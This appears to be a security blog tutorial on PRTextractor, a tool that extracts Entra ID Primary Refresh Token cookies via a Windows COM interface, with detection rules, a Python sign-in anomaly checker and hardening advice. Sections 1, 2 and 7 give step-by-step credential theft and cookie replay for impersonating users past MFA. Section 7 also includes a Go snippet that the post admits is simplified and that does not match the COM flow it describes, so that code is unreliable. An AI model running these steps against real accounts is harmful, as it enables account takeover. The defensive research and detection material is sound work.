
Introduction
A new weapon has entered the red team arsenal. Security researcher Iván Cabrera Fresno recently unveiled PRTextractor, a Go-based tool designed to stealthily extract the `x-ms-RefreshTokenCredential` cookie (commonly known as the PRT cookie) from Microsoft Entra ID-joined Windows devices. The tool works by abusing a legitimate Windows COM interface, IProofOfPossessionCookieInfoManager, which is the same interface the Edge browser uses to obtain Single Sign-On cookies without re-authenticating. With this cookie in hand, an attacker can fully impersonate a user across Microsoft 365, Azure Portal, and other Entra ID-integrated services—effectively bypassing both passwords and Multi-Factor Authentication (MFA).
Learning Objectives
- Understand the role of the Primary Refresh Token (PRT) in Microsoft Entra ID authentication and its parallels to a Kerberos TGT.
- Learn how PRTextractor works, including its stealthy COM-based extraction method and its step-by-step workflow.
- Acquire hands-on skills to use PRTextractor in authorized red team exercises, import stolen cookies into a browser, and generate access tokens for lateral movement.
- Identify key detection and mitigation strategies against pass-the-PRT attacks, including Conditional Access token protection and TPM device binding.
You Should Know
1. How PRTextractor Extracts the PRT Cookie Without Touching LSASS
PRTextractor sets itself apart by being a pure, low-noise extraction tool. Unlike older techniques that rely on dumping the Local Security Authority Subsystem Service (LSASS) with tools like Mimikatz—a common trigger for endpoint detection and response (EDR) alerts—PRTextractor follows the same flow the Windows OS itself uses for SSO. This makes it incredibly stealthy.
The tool performs the following steps:
- Registry Enumeration: Reads the Entra ID tenant ID and device ID from the Windows registry (`HKLM\SYSTEM\...\CloudDomainJoin\JoinInfo` and `HKLM\SOFTWARE\...\AAD\Package`). This step identifies the target device’s cloud identity and confirms if the PRT is TPM-protected.
- Nonce Retrieval: Sends an HTTP POST request to `https://login.microsoftonline.com/oauth2/token` with the `grant_type=srv_challenge` parameter to obtain a nonce (a number used once) from Microsoft.
- COM Interface Invocation: Calls the legitimate Windows COM interface `IProofOfPossessionCookieInfoManager` directly. It passes the nonce to the method `GetCookieInfoForUri`, which returns the PRT cookie. This is the same method that browsers use to get cookies automatically, so it appears as normal system activity.
- JSON Output: The extracted cookie is saved in a JSON format that is immediately compatible with browser cookie management extensions like EditThisCookie or Cookie-Editor, making the replay attack trivial to execute.
What makes this stealthy? The tool performs no code injection, no LSASS dumping, and no kernel manipulation. It uses the legitimate Windows API exactly as Microsoft intended. From a detection standpoint, this activity is nearly indistinguishable from a user logging into their device.
2. Executing a Pass-the-PRT Attack with the Stolen Cookie
Once you have the JSON cookie from PRTextractor, you can perform a complete pass-the-PRT attack. The process is straightforward and highly effective. Here is a step-by-step guide to using the tool in an authorized penetration test:
Step 1: Compile or Download PRTextractor
PRTextractor is written in Go, which allows for easy cross-compilation. You can compile it from source:
```shell
git clone https://github.com/ivancabrera02/PRTextractor.git
cd PRTextractor
go build -o PRTextractor.exe
```
Alternatively, you can download a pre-compiled binary from the GitHub releases page.
Step 2: Run PRTextractor on the Target Windows Device
Assuming you have gained initial access to an Entra ID-joined device (e.g., via a phishing campaign or an unpatched vulnerability), execute the tool:
```shell
PRTextractor.exe
```
The output will be a JSON object similar to this:
```json
{
  "domain": "login.microsoftonline.com",
  "hostOnly": false,
  "httpOnly": false,
  "name": "x-ms-RefreshTokenCredential",
  "path": "/",
  "sameSite": "no_restriction",
  "secure": true,
  "session": false,
  "storeId": "0",
  "value": "0.AY4A...AAA",
  "id": 0
}
```
Step 3: Import the Cookie into a Browser
- Install a cookie management extension in Firefox or Chrome (e.g., Cookie-Editor).
- Open a new tab and navigate to `https://login.microsoftonline.com`.
- Open the extension and choose “Import”.
- Paste the entire JSON output from PRTextractor and save it.
Step 4: Access Cloud Resources
With the cookie now loaded, navigate to `https://portal.azure.com` or `https://myapps.microsoft.com`. The browser will automatically use the PRT cookie to authenticate you as the target user. You will have full access to all the victim’s cloud resources without ever entering a password or an MFA code.
Step 5: Generate Access Tokens for Lateral Movement (Optional)
For more advanced post-exploitation, use the extracted PRT cookie with tools like ROADtools Token eXchange (roadtx) to request specific access tokens. This is particularly useful for authenticating to APIs or the Microsoft Graph.
```shell
# First, convert the JSON cookie to a file (cookie.json)
# Then, use roadtx to get an access token
roadtx getaccesstoken --prt-cookie cookie.json --resource https://graph.microsoft.com
```
3. The Technical Magic: Abusing `IProofOfPossessionCookieInfoManager`
The core of PRTextractor lies in its abuse of a documented Windows COM interface. `IProofOfPossessionCookieInfoManager` is the interface that allows applications like Microsoft Edge to silently obtain SSO cookies for a logged-in user. It is designed to provide a seamless authentication experience, but it also creates a powerful attack vector.
When an attacker calls `GetCookieInfoForUri` with the correct parameters (including the nonce obtained from Microsoft’s servers), the COM interface returns the PRT cookie. The device has already proven possession of the private key associated with the device identity, and the COM interface acts as a trusted broker. This entire process is transparent to the user and to most security products, as it is simply the operating system performing its designed function.
The tool communicates with `login.microsoftonline.com` using the WinHTTP library, which means it has no external network dependencies beyond standard Windows HTTP calls. This further reduces its fingerprint on the network.
4. Hunting for PRT Theft: Blue Team Detection Strategies
For defenders, the stealthiness of PRTextractor presents a significant challenge. However, there are several detection strategies that can help identify PRT abuse:
Audit COM Object Instantiation
- Monitor for unusual processes (e.g., `cmd.exe`, `powershell.exe`, or non-browser binaries) instantiating the `IProofOfPossessionCookieInfoManager` COM object.
- Use Sysmon Event ID 7 (Image loaded) to track when `ProofOfPossessionCookieInfo.dll` is loaded into non-standard processes.
Analyze Login Patterns
- Look for authentication logs where the `user agent` or `device ID` suddenly changes. A PRT replayed from an attacker’s machine will often have a different browser fingerprint or operating system than the original device.
- In Entra ID sign-in logs, check the `Device info` and `Browser` fields for anomalies. A PRT cookie stolen from a Windows device but replayed from a Linux machine running a headless browser should trigger an alert.
Monitor for Nonce Requests
- A prerequisite for extracting the PRT is the `srv_challenge` request to `login.microsoftonline.com/oauth2/token`. While this is a legitimate API call, an unusually high frequency of these requests from a single host, especially from non-browser processes, may indicate automated extraction.
Endpoint Detection and Response (EDR) Rules
- Create EDR rules that detect attempts to access the registry keys used by PRTextractor (`HKLM\SYSTEM\...\CloudDomainJoin\JoinInfo`) from suspicious parent processes.
- Look for the execution of any binary named `PRTextractor.exe` or binaries that import `ProofOfPossessionCookieInfo.dll` and make WinHTTP calls to Microsoft login endpoints.
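The sign-in pattern checks described above, as an added example that is not part of the original post or the PRTextractor project: it runs over constructed records that mimic the field names of the Entra ID sign-in log (`deviceDetail.deviceId`, `operatingSystem`, `browser`, `userAgent`, all assumed here) and flags a device whose fingerprint changes between sign-ins, which is what a PRT cookie replayed from another machine looks like.

```python
"""Flag sign-ins whose device fingerprint contradicts the device that holds the PRT."""

# Constructed sample records (a subset of Entra sign-in log fields), not real data.
SIGNINS = [
    {"createdDateTime": "2024-05-01T08:00:00Z", "userPrincipalName": "alice@example.com",
     "ipAddress": "203.0.113.10", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Edg/124.0",
     "deviceDetail": {"deviceId": "d1", "operatingSystem": "Windows10", "browser": "Edge 124.0.0"}},
    {"createdDateTime": "2024-05-01T08:05:00Z", "userPrincipalName": "bob@example.com",
     "ipAddress": "203.0.113.11", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0",
     "deviceDetail": {"deviceId": "d2", "operatingSystem": "Windows10", "browser": "Chrome 124.0.0"}},
    {"createdDateTime": "2024-05-01T09:30:00Z", "userPrincipalName": "alice@example.com",
     "ipAddress": "198.51.100.7", "userAgent": "Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/124.0",
     "deviceDetail": {"deviceId": "d1", "operatingSystem": "Linux", "browser": "Chrome 124.0.0"}},
]


def find_prt_replay(signins):
    """Return one alert per sign-in that contradicts its device's first-seen baseline."""
    baseline = {}  # deviceId -> (operatingSystem, browser family) from the first sign-in seen
    alerts = []
    for s in sorted(signins, key=lambda r: r["createdDateTime"]):
        detail = s.get("deviceDetail") or {}
        device_id = detail.get("deviceId")
        if not device_id:
            continue  # no device identity in the sign-in means no PRT was used; out of scope
        os_name = detail.get("operatingSystem", "")
        browser = (detail.get("browser") or "").split(" ")[0]
        reasons = []
        if device_id in baseline:
            base_os, base_browser = baseline[device_id]
            if os_name != base_os:  # a joined device does not change OS between sign-ins
                reasons.append(f"operating system changed {base_os} -> {os_name}")
            if browser != base_browser:
                reasons.append(f"browser changed {base_browser} -> {browser}")
        else:
            baseline[device_id] = (os_name, browser)
        if "headless" in s.get("userAgent", "").lower():
            reasons.append("headless browser user agent")
        if reasons:
            # A browser switch on its own is weak evidence; an OS change or headless UA is not.
            severity = "high" if any(not r.startswith("browser") for r in reasons) else "low"
            alerts.append({"user": s["userPrincipalName"], "deviceId": device_id,
                           "time": s["createdDateTime"], "ip": s["ipAddress"],
                           "severity": severity, "reasons": reasons})
    return alerts
```

On real exports, seed the baseline from a longer history window and confirm the device object in Entra before treating an OS change as theft rather than a re-enrolled device.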
5. Hardening Entra ID Against Pass-the-PRT Attacks
While the pass-the-PRT technique is powerful, Microsoft has provided specific controls to mitigate it. The most effective protection is Conditional Access token protection (also known as device binding), which is currently in preview.
Token Protection (Device Binding)
- When token protection is enabled, the access token and refresh token are cryptographically bound to the device’s private key (usually stored in the TPM). Even if an attacker extracts the PRT cookie, they cannot use it from a different device because the token validation on Microsoft’s side will fail.
- To enable this feature, navigate to Azure AD > Security > Conditional Access > Token protection and configure a policy that requires token protection for sensitive applications.
Additional Mitigations
- Use TPM-bound keys: Ensure that all Entra ID-joined devices use a TPM (Trusted Platform Module) to store the device’s private key. While PRTextractor can still extract the PRT cookie, a properly configured token protection policy will render the cookie useless on any other device.
- Restrict local administrator privileges: Many token theft techniques require administrative rights to access LSASS or the CloudAP DLL. By enforcing least privilege and using tools like Microsoft Defender for Endpoint, you can limit the ability of an attacker to execute extraction tools.
- Implement risk-based Conditional Access policies: Use sign-in risk and user risk policies to challenge users when they attempt to log in from a new device, location, or IP address. This adds an extra layer of defense even if the PRT is stolen.
- Shorten token lifetimes: While this does not prevent theft, reducing the validity period of refresh tokens limits the window of opportunity for an attacker. Configure token lifetimes in Entra ID to be as short as your operational requirements allow.
6. Alternative Tools and Techniques for PRT Extraction
PRTextractor is not the only tool in this space. Red teams and attackers have several options for obtaining PRTs, each with its own trade-offs in terms of stealth, reliability, and ease of use.
| Tool/Method | Technique | Stealth Level | Privileges Required |
|---|---|---|---|
| PRTextractor | COM interface (IProofOfPossessionCookieInfoManager) | Very High | User (non-admin) |
| aad_prt_bof | Beacon Object File (BOF) that interacts with the CloudAP DLL | High | Admin (for LSASS access) |
| Mimikatz (dpapi::cloudapkd) | Decrypts the PRT key material from the CloudAP DPAPI blob | Low (triggers many EDRs) | Admin |
| Get-AADIntUserPRTToken | Uses `BrowserCore.exe` to obtain the PRT cookie | Medium (depends on execution context) | User |
| Manual COM Invocation | Write a custom C or PowerShell script that calls the COM interface directly | High (if custom and signed) | User |
PRTextractor’s advantage is that it works from a non-administrative user context and does not touch LSASS, making it one of the stealthiest options currently available.
7. Building Your Own PRT Extractor in Go
For those who want to understand the underlying mechanics, here is a simplified code snippet demonstrating how to call the COM interface in Go. This is the core of what PRTextractor does:
```go
package main

import (
	"fmt"
	"syscall"
	"unsafe"
)

func main() {
	// Load the ProofOfPossessionCookieInfo DLL
	dll := syscall.NewLazyDLL("ProofOfPossessionCookieInfo.dll")
	proc := dll.NewProc("GetProofOfPossessionCookieInfo")

	// The URI to request the cookie for (including the nonce)
	uri := syscall.StringToUTF16Ptr("https://login.microsoftonline.com/...?sso_nonce=...")
	var cookieInfo unsafe.Pointer

	// Call the exported function
	ret, _, _ := proc.Call(uintptr(unsafe.Pointer(uri)), uintptr(unsafe.Pointer(&cookieInfo)))
	if ret == 0 { // S_OK
		// Process the returned cookie
		fmt.Println("Cookie extracted successfully")
		// ... marshall the cookieInfo struct into a JSON object ...
	} else {
		fmt.Println("Failed to extract cookie")
	}
}
```
In practice, the COM call is more complex, involving the `IProofOfPossessionCookieInfoManager` interface and proper error handling. The full source code of PRTextractor is available on GitHub and serves as an excellent reference for researchers.
What Undercode Say
- PRTextractor represents a paradigm shift in PRT theft, moving from noisy LSASS dumping to a stealthy, legitimate COM interface call that blends in with normal system activity.
- The tool is highly dangerous because it requires no administrative privileges, no code injection, and produces no obvious EDR triggers, making it an ideal post-exploitation tool.
- For blue teams, the primary detection vector is behavioral: monitor for non-browser processes instantiating SSO-related COM objects and analyze Entra ID sign-in logs for device fingerprint anomalies.
- The most effective long-term mitigation is Microsoft’s token protection (device binding), which cryptographically ties tokens to a specific device’s TPM, rendering stolen PRT cookies useless on other machines.
- Organizations should prioritize enabling token protection for Conditional Access policies, especially for administrative and privileged user accounts, as this directly neutralizes pass-the-PRT attacks.
- Red teams should add PRTextractor to their toolkits, but must be aware that reliance on the same technique by attackers means detection and response strategies will inevitably evolve to cover this vector.
- The open-source nature of the tool provides a valuable learning resource for both attackers and defenders to understand the intricacies of Entra ID authentication flows.
Prediction
The introduction of stealthy PRT extraction tools like PRTextractor will force Microsoft and the broader security community to accelerate the adoption of token protection and device binding as default settings rather than optional preview features. As these tools become more widely known and integrated into automated attack frameworks, we will see a surge in pass-the-PRT attacks targeting organizations that have not yet implemented Conditional Access token protection. This will likely lead to a “golden age” of identity-based cloud attacks, similar to the Kerberos Golden Ticket era in on-premises Active Directory. In response, EDR vendors will rush to add specific hooks and heuristics for COM interface abuse, and Microsoft will eventually make token protection mandatory for all Entra ID tenants. The cat-and-mouse game continues, but the balance is currently tipping in favor of the attacker.